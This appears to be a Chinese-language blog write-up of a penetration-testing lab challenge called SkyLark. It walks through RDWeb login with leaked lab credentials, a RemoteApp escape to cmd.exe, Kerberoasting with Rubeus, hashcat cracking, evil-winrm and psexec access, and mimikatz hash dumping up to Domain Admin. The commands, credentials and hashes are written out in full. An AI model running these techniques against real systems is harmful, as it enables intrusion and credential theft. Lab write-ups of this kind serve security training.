Challenge 3 - SkyLark(3)
Challenge 3 - SkyLark(3)
下一步鎖定的機器是 .221
選擇這一台的原因是在上一節中讀到了一個 user-guide-rdweb.pdf
當中告知網站的名稱是 /RDWeb 且提供了一組帳號密碼 SKYLARK\kiosk:XEwUS^9R2Gwt8O914
重新枚舉相關機器在 .221 發現如下的 /RDWeb
使用提供的帳號密碼登入後如下圖
點選了圖中的 "SkylarkStatus" 圖示後下載了一個 "cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp" 檔案
測試使用指令└─$ xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp /d:SKYLARK /u:kiosk /p:XEwUS^9R2Gwt8O914
這個看來是名稱解析錯誤
查了一下該 RDP 使用的名稱是 "AUSTIN02.SKYLARK.COM"
寫死 Hosts file
再測試一次,xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp /d:SKYLARK /u:kiosk /p:XEwUS^9R2Gwt8O914
出現如下圖的畫面
點選 config file 直接跳出 Windows 檔案總管
直接在檔案總管的路徑輸入 c:\windows\system32\cmd.exe 成功叫出 command line
直接拿到第一階段的 flag
whoami /priv 沒有甚麼權限
.\Rubeus.exe asreproast /nowrap 看來沒有東西
使用 .\Rubeus.exe kerberroast /nowrap 沒有產出結果
改用 .\Rubeus.exe kerberoast /outfile:hashes.kerberoast 發現 backup_service 帳號
SPN : AUSTIN02/backup_service.SKYLARK.com:6000
有產出該服務帳號的 hash
hashcat 破解看看,└─$ hashcat -m 13100 backup_service.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crackmapexec 測試看看發現是管理者
evil-winrm 可以直接進去,└─$ evil-winrm -i 192.168.196.221 -u 'SKYLARK\backup_service' -p 'It4Server'
impacket-psexec 也沒有問題,impacket-psexec skylark.com/backup_service:It4Server@192.168.196.221,登入後直接拿取第二階段 flag
進階枚舉,執行 mimikatz.exe 得到 .221 administrator NTLM hash 如下
17add237f30abaecc9d884f72958b928
RDWebAccess hash 480ee0be16785696cb0d734518dc8c31
跑 bloodhound 看一下,發現原來 backup_service 既然是 Domain Admins 成員
.221 這一台有兩隻腳,要進內網可以透過這一台搭建通道
更新攻擊列表
使用者看來有 10 個人
先更新一版暫時的密碼表,已經拿到 Domain Admin
等進到 DC 再來更新完整版
留言
張貼留言